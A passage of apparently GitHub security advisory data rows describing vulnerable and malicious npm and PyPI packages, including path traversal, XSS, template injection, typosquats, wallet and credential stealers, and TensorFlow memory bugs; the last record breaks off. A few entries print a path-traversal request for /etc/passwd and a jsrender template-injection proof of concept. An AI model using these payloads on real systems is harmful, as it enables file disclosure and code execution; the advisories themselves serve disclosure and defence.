+1.4.0,GHSA-c3h5-qchh-46hh,2023-09-11T16:37:27Z,2020-09-01T17:30:17Z,,['CVE-2017-16167'],Directory Traversal in yyooopack,"Affected versions of `yyooopack` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'yyooopack'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16167'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/yyooopack'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/400'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:21:53Z', 'nvd_published_at': None}"
+1.4.0,GHSA-vpj4-89q8-rh38,2020-08-31T18:46:32Z,2020-09-03T18:16:59Z,,[],Cross-Site Scripting in bpmn-js-properties-panel,"Versions of `bpmn-js-properties-panel` prior to 0.31.0 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize input in specially configured diagrams, which may allow attackers to inject arbitrary JavaScript in the embedding website.
+
+
+## Recommendation
+
+Upgrade to version 0.31.0 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'bpmn-js-properties-panel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.31.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1079'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:46:32Z', 'nvd_published_at': None}"
+1.4.0,GHSA-mvmf-cvfx-qg55,2021-09-23T21:06:09Z,2020-09-01T15:16:43Z,,['CVE-2014-8881'],Regular Expression Denial of Service in bleach,"All versions of the `bleach` package are vulnerable to a regular expression denial of service attack when certain types of input are passed into the sanitize function.
+
+
+
+## Recommendation
+
+The `bleach` package is not currently maintained, and has not seen an update since 2014.
+
+To mitigate this issue, it is necessary to use an alternative module that is actively maintained and provides similar functionality. There are [multiple modules fitting this criteria available on npm.](https://www.npmjs.com/search?q=html%20sanitizer&page=1&ranking=optimal).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'bleach'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2014-8881'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/npm:bleach:20151024'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/47'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:09:10Z', 'nvd_published_at': None}"
+1.4.0,GHSA-rw4r-h883-8pf9,2021-10-01T14:06:53Z,2020-09-02T20:30:02Z,,[],Malicious Package in reequest,"All versions of `reequest` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'reequest'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/861'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:38:32Z', 'nvd_published_at': None}"
+1.4.0,GHSA-h2j3-gg8w-4858,2021-09-29T21:12:39Z,2020-09-03T22:12:09Z,,[],Malicious Package in buffer-xos,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'buffer-xos'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1251'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:52:25Z', 'nvd_published_at': None}"
+1.4.0,GHSA-r87w-47m8-22w3,2023-09-07T20:41:26Z,2020-09-01T15:24:24Z,,['CVE-2016-3942'],Template Injection in jsrender,"Affected versions of `jsrender` are susceptible to a remote code execution vulnerability when used with server delivered client-side tempates which dynamically embed user input.
+
+## Proof of Concept
+
+
+```js
+//POC-REQUEST
+{{for ~x!=1?(constructor.constructor(""return arguments.callee.caller"")()):~y(10)}}
+{{:#data}}
+{{/for}}
+```
+
+```js
+//POC-RESPONSE
+function anonymous(data,view,j,u) { // template var v,t=j._tag,ret="""" +t(""for"",view,this,[ {view:view,tmpl:1, params:{args:['~x!=1?(constructor.constructor(\""return arguments.callee.caller\"")()):~y(10)']}, args:[view.hlp(""x"")!=1?(data.constructor.constructor(""return arguments.callee.caller"")()):view.hlp(""y"")(10)], props:{}}]); return ret; }
+```
+
+
+## Recommendation
+
+Update to version 0.9.74 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'jsrender'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.9.74'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.9.73'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-3942'}, {'type': 'WEB', 'url': 'https://github.com/BorisMoore/jsrender/commit/f984e139deb0a7648d5b543860ec652c21f6dcf6'}, {'type': 'PACKAGE', 'url': 'https://github.com/BorisMoore/jsrender'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-DOTNET-JSRENDER-60173'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/97'}]","{'cwe_ids': ['CWE-94'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:10:44Z', 'nvd_published_at': None}"
+1.4.0,GHSA-qjfh-xc44-rm9x,2020-08-31T18:43:54Z,2020-09-03T16:49:43Z,,[],Path Traversal in file-static-server,"All versions of `file-static-server` are vulnerable to Path Traversal. Due to insufficient input sanitization in URLs, attackers can access server files by using relative paths when fetching files.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative module until a fix is made available.
+",[],"[{'package': {'ecosystem': 'npm', 'name': 'file-static-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://hackerone.com/reports/310671'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1008'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:43:54Z', 'nvd_published_at': None}"
+1.4.0,GHSA-wfw3-rgfr-6g67,2023-03-24T21:26:31Z,2020-09-01T16:40:42Z,,['CVE-2017-16009'],XSS via Angular Expression in ag-grid,"Affected versions of `ag-grid` are vulnerable to Cross-site Scripting (XSS) via Angular Expressions, if used in combination with AngularJS.
+
+
+## Recommendation
+
+Avoid using `ag-grid` in combination with AngularJS until a fix is available.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'ag-grid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '18.1.3-beta.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16009'}, {'type': 'WEB', 'url': 'https://github.com/ceolter/ag-grid/issues/1287'}, {'type': 'PACKAGE', 'url': 'https://github.com/ag-grid/ag-grid'}, {'type': 'WEB', 'url': 'https://spring.io/blog/2016/01/28/angularjs-escaping-the-expression-sandbox-for-xss'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:19:26Z', 'nvd_published_at': '2018-06-04T19:29:00Z'}"
+1.4.0,GHSA-j5qg-46p9-w2rp,2023-07-27T20:37:08Z,2020-09-03T00:33:32Z,,[],Malicious Package in jekyll-for-github-projects,"Version 0.2.12 of `jekyll-for-github-projects` contained malicious code. The code when executed in the browser would enumerate password, cvc and cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+Remove the package from your environment and evaluate your application to determine whether or not user data was compromised.
+
+Users may consider downgrading to version 0.2.11",[],"[{'package': {'ecosystem': 'npm', 'name': 'jekyll-for-github-projects'}, 'versions': ['0.2.12']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/936'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:41:08Z', 'nvd_published_at': None}"
+1.4.0,GHSA-xf64-2f9p-6pqq,2020-08-31T18:59:32Z,2020-09-04T17:24:08Z,,[],Information Exposure in type-graphql,"Versions of `type-graphql` prior to 0.17.6 are vulnerable to Information Exposure. The package leaks the resolver source code in an error message. It is possible to force this error when no subscription topics are provided in the request.
+
+
+## Recommendation
+
+Upgrade to version 0.17.6 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'type-graphql'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.17.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/MichalLytek/type-graphql/issues/489'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1444'}]","{'cwe_ids': ['CWE-209'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:59:32Z', 'nvd_published_at': None}"
+1.4.0,GHSA-qh32-6jjc-qprm,2021-08-26T15:19:19Z,2020-09-25T18:28:46Z,,['CVE-2020-15209'],Null pointer dereference in tensorflow-lite,"### Impact
+A crafted TFLite model can force a node to have as input a tensor backed by a `nullptr` buffer. This can be achieved by changing a buffer index in the flatbuffer serialization to convert a read-only tensor to a read-write one. The runtime assumes that these buffers are written to before a possible read, hence they are initialized with `nullptr`:
+https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/lite/core/subgraph.cc#L1224-L1227
+
+However, by changing the buffer index for a tensor and implicitly converting that tensor to be a read-write one, as there is nothing in the model that writes to it, we get a null pointer dereference.
+
+### Patches
+We have patched the issue in 0b5662bc and will release patch releases for all versions between 1.15 and 2.3.
+
+We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360 but was also discovered through variant analysis of [GHSA-cvpc-8phh-8f45](https://github.com/tensorflow/tensorflow/security/advisories/GHSA-cvpc-8phh-8f45).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-qh32-6jjc-qprm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15209'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/0b5662bc2be13a8c8f044d925d87fb6e56247cd8'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/releases/tag/v2.3.1'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00065.html'}]","{'cwe_ids': ['CWE-476'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-09-25T18:13:03Z', 'nvd_published_at': '2020-09-25T19:15:00Z'}"
+1.4.0,GHSA-fw76-p9p2-6pvf,2021-09-30T20:28:12Z,2020-09-03T19:58:58Z,,[],Malicious Package in serilize,"This package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.
+
+
+## Recommendation
+
+Remove the package from your environment. There are no indications of further compromise.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'serilize'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1140'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:48:43Z', 'nvd_published_at': None}"
+1.4.0,GHSA-gvff-25cc-4f66,2020-08-31T18:44:58Z,2020-09-03T17:15:56Z,,[],Path Traversal in restify-swagger-jsdoc,"Versions of `restify-swagger-jsdoc` prior to 3.2.1 are vulnerable to Path Traversal. The package fails to properly sanitize URLs, which may allow attackers to access server files outside the `swagger-ui` folder by using relative paths.
+
+
+
+## Recommendation
+
+Upgrade to version 3.2.1 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'restify-swagger-jsdoc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.1'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1037'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:44:58Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6c37-2rw5-9j7x,2021-10-01T14:04:27Z,2020-09-02T20:25:46Z,,[],Malicious Package in requesst,"All versions of `requesst` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'requesst'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/857'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:38:23Z', 'nvd_published_at': None}"
+1.4.0,GHSA-563h-697m-j7x5,2023-07-27T20:36:07Z,2020-09-03T19:18:58Z,,[],Malicious Package in device-mqtt,"Version 1.0.11 of `device-mqtt` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+Remove the package from your environment. It's also recommended to evaluate your application to determine whether or not user data was compromised.
+
+Users may consider downgrading to version 1.0.10",[],"[{'package': {'ecosystem': 'npm', 'name': 'device-mqtt'}, 'versions': ['1.0.11']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1109'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:47:35Z', 'nvd_published_at': None}"
+1.4.0,GHSA-x7gm-rfgv-w973,2022-01-06T20:22:25Z,2020-09-28T19:05:29Z,,['CVE-2020-15225'],Potential DoS with NumberFilter conversion to integer values.,"### Impact
+
+Automatically generated `NumberFilter` instances, whose value was later converted to an integer, were subject to potential DoS from maliciously input using exponential format with sufficiently large exponents.
+
+### Patches
+
+Version 2.4.0+ applies a `MaxValueValidator` with a a default `limit_value` of 1e50 to the form field used by `NumberFilter` instances.
+
+In addition, `NumberFilter` implements the new `get_max_validator()` which should return a configured validator instance to customise the limit, or else `None` to disable the additional validation.
+
+### Workarounds
+
+Users may manually apply an equivalent validator if they are not able to upgrade.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [the django-filter repo](https://github.com/carltongibson/django-filter)
+
+Thanks to Marcin Waraksa for the report.
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'django-filter'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/carltongibson/django-filter/security/advisories/GHSA-x7gm-rfgv-w973'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15225'}, {'type': 'WEB', 'url': 'https://github.com/carltongibson/django-filter/commit/340cf7a23a2b3dcd7183f6a0d6c383e85b130d2b'}, {'type': 'PACKAGE', 'url': 'https://github.com/carltongibson/django-filter'}, {'type': 'WEB', 'url': 'https://github.com/carltongibson/django-filter/releases/tag/2.4.0'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DPHENTRHRAYFXYPPBT7JRHZRWILRY44S/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FAT2ZAEF6DM3VFSOHKB7X3ASSHGQHJAK/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SVJ7AYU6FUSU3F653YCGW5LFD3IULRSX/'}, {'type': 'WEB', 'url': 'https://pypi.org/project/django-filter/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210604-0010/'}]","{'cwe_ids': ['CWE-681'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-09-28T19:04:39Z', 'nvd_published_at': '2021-04-29T21:15:00Z'}"
+1.4.0,GHSA-6f93-xj8r-jp82,2021-09-29T21:36:55Z,2020-09-03T22:28:21Z,,[],Malicious Package in bunfer-xor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'bunfer-xor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1267'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:53:05Z', 'nvd_published_at': None}"
+1.4.0,GHSA-vrxj-4qhw-5vwq,2021-10-04T14:29:03Z,2020-09-03T17:03:41Z,,[],Malicious Package in scryptys,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'scryptys'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1407'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:58:12Z', 'nvd_published_at': None}"
+1.4.0,GHSA-x7rp-74x2-mjf3,2021-08-26T15:13:38Z,2020-09-25T18:28:32Z,,['CVE-2020-15200'],Segfault in Tensorflow,"### Impact
+The `RaggedCountSparseOutput` implementation does not validate that the input arguments form a valid ragged tensor. In particular, there is no validation that the values in the `splits` tensor generate a valid partitioning of the `values` tensor. Thus, the [following code](https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/core/kernels/count_ops.cc#L248-L265
+) sets up conditions to cause a heap buffer overflow:
+```cc
+ auto per_batch_counts = BatchedMap(num_batches);
+ int batch_idx = 0;
+ for (int idx = 0; idx < num_values; ++idx) {
+ while (idx >= splits_values(batch_idx)) {
+ batch_idx++;
+ }
+ const auto& value = values_values(idx);
+ if (value >= 0 && (maxlength_ <= 0 || value < maxlength_)) {
+ per_batch_counts[batch_idx - 1][value] = 1;
+ }
+ }
+```
+
+A `BatchedMap` is equivalent to a vector where each element is a hashmap. However, if the first element of `splits_values` is not 0, `batch_idx` will never be 1, hence there will be no hashmap at index 0 in `per_batch_counts`. Trying to access that in the user code results in a segmentation fault.
+
+### Patches
+We have patched the issue in 3cbb917b4714766030b28eba9fb41bb97ce9ee02 and will release a patch release.
+
+We recommend users to upgrade to TensorFlow 2.3.1.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability is a variant of [GHSA-p5f8-gfw5-33w4](https://github.com/tensorflow/tensorflow/security/advisories/GHSA-p5f8-gfw5-33w4)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-x7rp-74x2-mjf3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15200'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/3cbb917b4714766030b28eba9fb41bb97ce9ee02'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/releases/tag/v2.3.1'}]","{'cwe_ids': ['CWE-122', 'CWE-20', 'CWE-787'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-09-25T17:21:36Z', 'nvd_published_at': '2020-09-25T19:15:00Z'}"
+1.4.0,GHSA-855m-jchh-9qjc,2021-10-01T14:01:42Z,2020-09-02T20:19:22Z,,[],Malicious Package in commnader,"All versions of `commnader` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'commnader'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/850'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:38:06Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9qrg-h9g8-c65q,2020-08-31T18:55:28Z,2020-09-04T15:14:26Z,,[],Prototype Pollution in deep-setter,"All versions of `deep-setter` are vulnerable to prototype pollution. The package does not restrict the modification of an Object's prototype, which may allow an attacker to add or modify an existing property that will exist on all objects.
+
+
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'deep-setter'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1333'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:55:28Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9hc2-w9gg-q6jw,2021-10-01T13:28:13Z,2020-09-01T21:07:41Z,,[],Malicious Package in boogeyman,"All versions of `boogeyman` are considered malicious. This particular package would download a payload from pastebin.com, eval it to read ssh keys and the users `.npmrc` and send them to a private pastebin account.
+
+
+## Recommendation
+
